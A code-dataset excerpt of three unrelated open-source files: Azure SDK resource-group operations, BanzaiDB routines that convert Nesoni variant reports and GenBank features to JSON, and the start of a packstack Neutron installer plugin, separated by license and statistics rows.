401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-05-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ResourceGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}'} # type: ignore
def update(
self,
resource_group_name, # type: str
parameters, # type: "_models.ResourceGroupPatchable"
**kwargs # type: Any
):
# type: (...) -> "_models.ResourceGroup"
"""Updates a resource group.
Resource groups can be updated through a simple PATCH operation to a group address. The format
of the request is the same as that for creating a resource group. If a field is unspecified,
the current value is retained.
:param resource_group_name: The name of the resource group to update. The name is case
insensitive.
:type resource_group_name: str
:param parameters: Parameters supplied to update a resource group.
:type parameters: ~azure.mgmt.resource.resources.v2019_05_01.models.ResourceGroupPatchable
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceGroup, or the result of cls(response)
:rtype: ~azure.mgmt.resource.resources.v2019_05_01.models.ResourceGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ResourceGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-05-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ResourceGroupPatchable')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ResourceGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}'} # type: ignore
def export_template(
self,
resource_group_name, # type: str
parameters, # type: "_models.ExportTemplateRequest"
**kwargs # type: Any
):
# type: (...) -> "_models.ResourceGroupExportResult"
"""Captures the specified resource group as a template.
:param resource_group_name: The name of the resource group to export as a template.
:type resource_group_name: str
:param parameters: Parameters for exporting the template.
:type parameters: ~azure.mgmt.resource.resources.v2019_05_01.models.ExportTemplateRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceGroupExportResult, or the result of cls(response)
:rtype: ~azure.mgmt.resource.resources.v2019_05_01.models.ResourceGroupExportResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ResourceGroupExportResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-05-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.export_template.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ExportTemplateRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ResourceGroupExportResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
export_template.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/exportTemplate'} # type: ignore
def list(
self,
filter=None, # type: Optional[str]
top=None, # type: Optional[int]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ResourceGroupListResult"]
"""Gets all the resource groups for a subscription.
:param filter: The filter to apply on the operation.:code:`<br>`:code:`<br>`You can filter by
tag names and values. For example, to filter for a tag name and value, use $filter=tagName eq
'tag1' and tagValue eq 'Value1'.
:type filter: str
:param top: The number of results to return. If null is passed, returns all resource groups.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ResourceGroupListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.resource.resources.v2019_05_01.models.ResourceGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ResourceGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-05-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ResourceGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups'} # type: ignore
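
# --- Editor's note: illustrative sketch, not part of the original file. ---
# These operations are normally reached through the generated ResourceManagementClient
# rather than instantiated directly; the credential type (azure-identity) and the
# subscription id below are assumptions.
if __name__ == '__main__':
    from azure.identity import DefaultAzureCredential
    from azure.mgmt.resource import ResourceManagementClient

    client = ResourceManagementClient(DefaultAzureCredential(), '<subscription-id>')
    client.resource_groups.create_or_update('example-rg', {'location': 'eastus'})
    for group in client.resource_groups.list():
        print(group.name)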
| mit | -7,771,075,385,938,910,000 | 47.414815 | 161 | 0.63942 | false |
mscook/BanzaiDB | src/BanzaiDB/core.py | 1 | 12137 | # Copyright 2013 Mitchell Stanton-Cook Licensed under the
# Educational Community License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may
# obtain a copy of the License at
#
# http://www.osedu.org/licenses/ECL-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS"
# BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
import sys
import os
from Bio import SeqIO
from BanzaiDB import parsers
#def bring_CDS_to_front(line):
# """
#
# """
# for e in feat_list:
# if e[]
def nway_reportify(nway_any_file):
"""
Convert a nway.any to something similar to report.txt
This converts the nway.any which contains richer information (i.e. N
calls) into something similar to report.txt
TODO: Add a simple example of input vs output of this method.
ref_id, position, strains, ref_base, v_class, changes, evidence,
consequences
    :param nway_any_file: full path as a string to the nway.any file
:type nway_any_file: string
:returns: a list of tuples. Each list element refers to a variant
position while the tuple contains the states of each strain
"""
parsed = []
nway_any_file = os.path.expanduser(nway_any_file)
if not os.path.isfile(nway_any_file):
print "Please specify a valid Nesoni n-way (any) SNP comparison file"
sys.exit(1)
else:
with open(nway_any_file, 'r') as f:
strains = f.readline().strip().split()[5:-1]
num_strains = len(strains)/3
strains = strains[:num_strains]
for line in f:
uncalled = False
cur = line.split("\t")
ref_id, position, v_class, ref_base = cur[0], int(cur[1]), cur[2], cur[3]
changes = cur[4:num_strains+4]
if 'N' in changes:
uncalled = True
evidence = cur[num_strains+4:(2*(num_strains))+4]
consequences = cur[(2*(num_strains))+4:-1]
# Something is broken if not true -
assert len(strains) == len(changes) == len(evidence)
results = zip([ref_id]*num_strains, [position]*num_strains, strains,
[ref_base]*num_strains, [v_class]*num_strains,
changes, evidence, consequences,
[uncalled]*num_strains)
parsed.append(results)
return parsed
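
# Editor's note (illustrative, not part of the original file): each element returned
# by nway_reportify() describes one variant position, and each tuple inside it holds
# one strain's state, in the order produced by the zip() above:
#     (ref_id, position, strain, ref_base, v_class, change, evidence, consequence, uncalled)
# e.g. iterating over the result:
#     for position_states in nway_reportify('nway.any'):
#         for (ref_id, pos, strain, ref_base, v_class,
#              change, evidence, cons, uncalled) in position_states:
#             print ref_id, pos, strain, change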
def extract_consequences(cons, ftype):
"""
Extracts out the data from a consequences line
    NOTE: This was originally the core of nesoni_report_to_JSON. However, as
    v_class is singular but substitution states are also observed in deletion
    states (and other similar mixtures), this method was refactored out.
:param cons: a consequences line
:param ftype: a feature type (substitution, insertion or deletion
:type cons: string
:type ftype: string
:returns: a data list (containing a controlled set of results)
"""
# May need to add more of these below
misc_set = ['tRNA', 'gene', 'rRNA']
    # Handle mixed features in the input reference. This needs to be more
    # generic.
mixed = cons.split(',')
if len(mixed) == 2:
# CDS is second
if mixed[1][1:4] == 'CDS':
cons = str(mixed[1][1:-1])+", "+mixed[0]+"\n"
# Work with CDS
if cons.strip() != '' and cons.split(' ')[0] == 'CDS':
if ftype.find("substitution") != -1:
# 0 1 2 3 4 5 6 7
# class|sub_type|locus_tag|base|codon|region|old_aa|new_aa|
# 8 9
# protein|correlated
dat = ('substitution',) + parsers.parse_substitution(cons)
elif ftype.find("insertion") != -1:
dat = ('insertion', None) + parsers.parse_insertion(cons)
elif ftype.find("deletion") != -1:
dat = ('deletion', None) + parsers.parse_deletion(cons)
else:
raise Exception("Unsupported. Only SNPs & INDELS")
dat = list(dat)
dat[3] = int(dat[3])
dat[4] = int(dat[4])
elif cons.strip() != '' and cons.split(' ')[0] in misc_set:
if ftype.find("substitution") != -1:
dat = (('substitution',) +
parsers.parse_substitution_misc(cons))
elif ftype.find("insertion") != -1:
dat = (('insertion', None) +
parsers.parse_insertion_misc(cons))
elif ftype.find("deletion") != -1:
dat = (('deletion', None) +
parsers.parse_deletion_misc(cons))
else:
raise Exception("Unsupported. Only SNPs & INDELS")
dat = list(dat)
dat[3] = int(dat[3])
else:
dat = [ftype.split('-')[0]]+[None]*9
return dat
def nesoni_report_to_JSON(reportified):
"""
Convert a nesoni nway.any file that has been reportified to JSON
See: tables.rst for info on what is stored in RethinkDB
:param reportified: the reportified nway.any file (been through
nway_reportify()). This is essentially a list of tuples
:returns: a list of JSON
"""
stats = {}
parsed_list = []
for position in reportified:
for elem in position:
skip = False
ref_id, pos, strain, old, ftype, new, evidence, cons, uncalled = elem
ref_id = '.'.join(ref_id.split('.')[:-1])
# Initialise the stats...
if strain not in stats:
stats[strain] = 0
if new == old:
# Have no change
#dat = ["conserved"]+[None]*9
skip = True
elif new == 'N':
# Have an uncalled base
#dat = ["uncalled"]+[None]*9
skip = True
# Check for mixtures...
elif ftype == "substitution" and new.find('-') != -1:
# Deletion hidden in substitution
ftype = 'deletion'
dat = extract_consequences(cons, ftype)
stats[strain] = stats[strain]+1
elif ftype == "substitution" and len(new) > 1:
# Insertion hidden in substitution
ftype = 'insertion'
dat = extract_consequences(cons, ftype)
stats[strain] = stats[strain]+1
elif ftype == "deletion" and new.find('-') == -1 and len(new) == 1:
# Substitution hidden in deletions
ftype = 'substitution'
dat = extract_consequences(cons, ftype)
stats[strain] = stats[strain]+1
elif ftype == "deletion" and new.find('-') == -1 and len(new) > 1:
# Insertion hidden in deletions
ftype = 'insertion'
dat = extract_consequences(cons, ftype)
stats[strain] = stats[strain]+1
elif ftype == "insertion" and new.find('-') != -1:
# Deletion hidden in insertions
ftype = 'deletion'
dat = extract_consequences(cons, ftype)
stats[strain] = stats[strain]+1
elif ftype == "insertion" and new.find('-') == -1 and len(new) == 1:
# Substitution hidden in insertions
ftype = 'substitution'
dat = extract_consequences(cons, ftype)
stats[strain] = stats[strain]+1
# We have the same change state across all strains
else:
dat = extract_consequences(cons, ftype)
stats[strain] = stats[strain]+1
obs_count = parsers.parse_evidence(evidence)
# Some simple tests
the_classes = ['insertion', 'deletion', 'substitution']
if not skip:
assert dat[0] in the_classes
json = {"id": strain+'_'+ref_id+'_'+str(pos),
"StrainID": strain,
"Position": pos,
"LocusTag": dat[2],
"Class": dat[0],
"SubClass": dat[1],
"RefBase": old,
"ChangeBase": new,
"CDSBaseNum": dat[3],
"CDSAANum": dat[4],
"CDSRegion": dat[5],
"RefAA": dat[6],
"ChangeAA": dat[7],
"Product": dat[8],
"CorrelatedChange": dat[9],
"Evidence": obs_count,
"UncalledBlock": uncalled
}
parsed_list.append(json)
return parsed_list, stats
def reference_genome_features_to_JSON(genome_file):
"""
From genome reference (GBK format) convert CDS, gene & RNA features to JSON
The following 2 are really good resources:
* http://www.ncbi.nlm.nih.gov/books/NBK63592/
* http://www.ncbi.nlm.nih.gov/genbank/genomesubmit_annotation
.. note:: also see tables.rst for detailed description of the JSON
schema
.. warning:: do not think that this handles misc_features
:param genome_file: the fullpath as a string to the genbank file
    :returns: a JSON representing the reference and a list of JSON
containing information on the features
"""
misc_set = ['tRNA', 'rRNA', 'tmRNA', 'ncRNA']
with open(genome_file) as fin:
genome = SeqIO.read(fin, "genbank")
gd, gn, gid = genome.description, genome.name, genome.id
print "Adding %s into the RethinkDB instance" % (gd)
JSON_r = {'revision': int(gid.split('.')[-1]),
'reference_name': gd,
'id': gn}
parsed_list = []
for feat in genome.features:
start = int(feat.location.start.position)
JSON_f = {'sequence': str(feat.extract(genome.seq)),
'start': start,
'end': int(feat.location.end.position),
'strand': int(feat.strand),
'reference_id': gid,
'product': None,
'translation': None,
'locus_tag': None}
# Handle CDS, gene, tRNA & rRNA features
# Do CDS
if feat.type == 'CDS':
locus_tag = feat.qualifiers['locus_tag'][0]
JSON_f['id'] = gid+"_"+locus_tag+"_CDS"
JSON_f['locus_tag'] = locus_tag
if 'pseudo' not in feat.qualifiers:
JSON_f['translation'] = feat.qualifiers['translation'][0]
JSON_f['product'] = feat.qualifiers['product'][0]
else:
JSON_f['product'] = 'pseudo'
parsed_list.append(JSON_f)
# Do gene
elif feat.type == 'gene':
locus_tag = feat.qualifiers['locus_tag'][0]
JSON_f['id'] = gid+"_"+locus_tag+"_gene"
if 'pseudo' not in feat.qualifiers:
try:
JSON_f['product'] = feat.qualifiers['gene'][0]
except:
pass
else:
JSON_f['product'] = 'pseudo'
parsed_list.append(JSON_f)
# Do other (*RNA)
elif feat.type in misc_set:
try:
JSON_f['product'] = feat.qualifiers['product'][0]
except KeyError:
JSON_f['product'] = None
JSON_f['id'] = gid+"_"+str(JSON_f['start'])+"-"+str(JSON_f['end'])
parsed_list.append(JSON_f)
else:
print "Skipped feature at %i to %i " % (JSON_f['start'],
JSON_f['end'])
return JSON_r, parsed_list
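
# --- Editor's note: illustrative sketch, not part of the original file. ---
# A minimal end-to-end pass over the two variant helpers; 'nway.any' is a
# placeholder path to a Nesoni n-way SNP comparison file.
if __name__ == '__main__':
    states = nway_reportify('nway.any')
    variants, per_strain_counts = nesoni_report_to_JSON(states)
    print per_strain_counts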
| apache-2.0 | -6,192,113,771,092,387,000 | 39.188742 | 89 | 0.517673 | false |
mohitsethi/packstack | packstack/plugins/neutron_350.py | 1 | 23513 | """
Installs and configures neutron
"""
import logging
import os
import re
import uuid
from packstack.installer import utils
from packstack.installer import validators
from packstack.modules.ospluginutils import getManifestTemplate, appendManifestFile
# Controller object will be initialized from main flow
controller = None
# Plugin name
PLUGIN_NAME = "OS-NEUTRON"
logging.debug("plugin %s loaded", __name__)
def initConfig(controllerObject):
global controller
controller = controllerObject
logging.debug("Adding OpenStack Neutron configuration")
conf_params = {
"NEUTRON" : [
{"CMD_OPTION" : "neutron-server-host",
"USAGE" : "The IP addresses of the server on which to install the Neutron server",
"PROMPT" : "Enter the IP address of the Neutron server",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_ip, validators.validate_ssh],
"DEFAULT_VALUE" : utils.get_localhost_ip(),
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_SERVER_HOST",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-ks-password",
"USAGE" : "The password to use for Neutron to authenticate with Keystone",
"PROMPT" : "Enter the password for Neutron Keystone access",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_not_empty],
"DEFAULT_VALUE" : uuid.uuid4().hex[:16],
"MASK_INPUT" : True,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NEUTRON_KS_PW",
"USE_DEFAULT" : True,
"NEED_CONFIRM" : True,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-db-password",
"USAGE" : "The password to use for Neutron to access DB",
"PROMPT" : "Enter the password for Neutron DB access",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_not_empty],
"DEFAULT_VALUE" : uuid.uuid4().hex[:16],
"MASK_INPUT" : True,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NEUTRON_DB_PW",
"USE_DEFAULT" : True,
"NEED_CONFIRM" : True,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-l3-hosts",
"USAGE" : "A comma separated list of IP addresses on which to install Neutron L3 agent",
"PROMPT" : "Enter a comma separated list of IP addresses on which to install the Neutron L3 agent",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_multi_ssh],
"DEFAULT_VALUE" : utils.get_localhost_ip(),
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_L3_HOSTS",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-l3-ext-bridge",
"USAGE" : "The name of the bridge that the Neutron L3 agent will use for external traffic, or 'provider' if using provider networks",
"PROMPT" : "Enter the bridge the Neutron L3 agent will use for external traffic, or 'provider' if using provider networks",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_not_empty],
"DEFAULT_VALUE" : "br-ex",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_L3_EXT_BRIDGE",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-dhcp-hosts",
"USAGE" : "A comma separated list of IP addresses on which to install Neutron DHCP agent",
"PROMPT" : "Enter a comma separated list of IP addresses on which to install Neutron DHCP agent",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_multi_ssh],
"DEFAULT_VALUE" : utils.get_localhost_ip(),
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_DHCP_HOSTS",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-l2-plugin",
"USAGE" : "The name of the L2 plugin to be used with Neutron",
"PROMPT" : "Enter the name of the L2 plugin to be used with Neutron",
"OPTION_LIST" : ["linuxbridge", "openvswitch"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "openvswitch",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NEUTRON_L2_PLUGIN",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-metadata-hosts",
"USAGE" : "A comma separated list of IP addresses on which to install Neutron metadata agent",
"PROMPT" : "Enter a comma separated list of IP addresses on which to install the Neutron metadata agent",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_multi_ssh],
"DEFAULT_VALUE" : utils.get_localhost_ip(),
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_METADATA_HOSTS",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-metadata-pw",
"USAGE" : "A comma separated list of IP addresses on which to install Neutron metadata agent",
"PROMPT" : "Enter a comma separated list of IP addresses on which to install the Neutron metadata agent",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_not_empty],
"DEFAULT_VALUE" : uuid.uuid4().hex[:16],
"MASK_INPUT" : True,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NEUTRON_METADATA_PW",
"USE_DEFAULT" : True,
"NEED_CONFIRM" : True,
"CONDITION" : False },
],
"NEUTRON_LB_PLUGIN" : [
{"CMD_OPTION" : "neutron-lb-tenant-network-type",
"USAGE" : "The type of network to allocate for tenant networks (eg. vlan, local, gre)",
"PROMPT" : "Enter the type of network to allocate for tenant networks",
"OPTION_LIST" : ["local", "vlan"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "local",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NEUTRON_LB_TENANT_NETWORK_TYPE",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-lb-vlan-ranges",
"USAGE" : "A comma separated list of VLAN ranges for the Neutron linuxbridge plugin (eg. physnet1:1:4094,physnet2,physnet3:3000:3999)",
"PROMPT" : "Enter a comma separated list of VLAN ranges for the Neutron linuxbridge plugin",
"OPTION_LIST" : [],
"VALIDATORS" : [],
"DEFAULT_VALUE" : "",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_LB_VLAN_RANGES",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-lb-interface-mappings",
"USAGE" : "A comma separated list of interface mappings for the Neutron linuxbridge plugin (eg. physnet1:br-eth1,physnet2:br-eth2,physnet3:br-eth3)",
"PROMPT" : "Enter a comma separated list of interface mappings for the Neutron linuxbridge plugin",
"OPTION_LIST" : [],
"VALIDATORS" : [],
"DEFAULT_VALUE" : "",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_LB_INTERFACE_MAPPINGS",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
],
"NEUTRON_OVS_PLUGIN" : [
{"CMD_OPTION" : "neutron-ovs-tenant-network-type",
"USAGE" : "Type of network to allocate for tenant networks (eg. vlan, local, gre)",
"PROMPT" : "Enter the type of network to allocate for tenant networks",
"OPTION_LIST" : ["local", "vlan", "gre"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "local",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NEUTRON_OVS_TENANT_NETWORK_TYPE",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-ovs-vlan-ranges",
"USAGE" : "A comma separated list of VLAN ranges for the Neutron openvswitch plugin (eg. physnet1:1:4094,physnet2,physnet3:3000:3999)",
"PROMPT" : "Enter a comma separated list of VLAN ranges for the Neutron openvswitch plugin",
"OPTION_LIST" : [],
"VALIDATORS" : [],
"DEFAULT_VALUE" : "",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_OVS_VLAN_RANGES",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-ovs-bridge-mappings",
"USAGE" : "A comma separated list of bridge mappings for the Neutron openvswitch plugin (eg. physnet1:br-eth1,physnet2:br-eth2,physnet3:br-eth3)",
"PROMPT" : "Enter a comma separated list of bridge mappings for the Neutron openvswitch plugin",
"OPTION_LIST" : [],
"VALIDATORS" : [],
"DEFAULT_VALUE" : "",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_OVS_BRIDGE_MAPPINGS",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-ovs-bridge-interfaces",
"USAGE" : "A comma separated list of colon-separated OVS bridge:interface pairs. The interface will be added to the associated bridge.",
"PROMPT" : "Enter a comma separated list of OVS bridge:interface pairs for the Neutron openvswitch plugin",
"OPTION_LIST" : [],
"VALIDATORS" : [],
"DEFAULT_VALUE" : "",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_OVS_BRIDGE_IFACES",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
],
"NEUTRON_OVS_PLUGIN_GRE" : [
{"CMD_OPTION" : "neutron-ovs-tunnel-ranges",
"USAGE" : "A comma separated list of tunnel ranges for the Neutron openvswitch plugin",
"PROMPT" : "Enter a comma separated list of tunnel ranges for the Neutron openvswitch plugin",
"OPTION_LIST" : [],
"VALIDATORS" : [],
"DEFAULT_VALUE" : "",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_OVS_TUNNEL_RANGES",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-ovs-tunnel-if",
"USAGE" : "Override the IP used for GRE tunnels on this hypervisor to the IP found on the specified interface (defaults to the HOST IP)",
"PROMPT" : "Enter interface with IP to override the default the GRE local_ip (defaults to HOST IP)",
"OPTION_LIST" : [],
"VALIDATORS" : [],
"DEFAULT_VALUE" : "",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_OVS_TUNNEL_IF",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
],
}
def use_linuxbridge(config):
return config['CONFIG_NEUTRON_INSTALL'] == 'y' and \
config['CONFIG_NEUTRON_L2_PLUGIN'] == 'linuxbridge'
def use_openvswitch(config):
return config['CONFIG_NEUTRON_INSTALL'] == 'y' and \
config['CONFIG_NEUTRON_L2_PLUGIN'] == 'openvswitch'
def use_openvswitch_gre(config):
return use_openvswitch(config) and \
config['CONFIG_NEUTRON_OVS_TENANT_NETWORK_TYPE'] == 'gre'
conf_groups = [
{ "GROUP_NAME" : "NEUTRON",
"DESCRIPTION" : "Neutron config",
"PRE_CONDITION" : "CONFIG_NEUTRON_INSTALL",
"PRE_CONDITION_MATCH" : "y",
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True },
{ "GROUP_NAME" : "NEUTRON_LB_PLUGIN",
"DESCRIPTION" : "Neutron LB plugin config",
"PRE_CONDITION" : use_linuxbridge,
"PRE_CONDITION_MATCH" : True,
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True },
{ "GROUP_NAME" : "NEUTRON_OVS_PLUGIN",
"DESCRIPTION" : "Neutron OVS plugin config",
"PRE_CONDITION" : use_openvswitch,
"PRE_CONDITION_MATCH" : True,
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True },
{ "GROUP_NAME" : "NEUTRON_OVS_PLUGIN_GRE",
"DESCRIPTION" : "Neutron OVS plugin config for GRE tunnels",
"PRE_CONDITION" : use_openvswitch_gre,
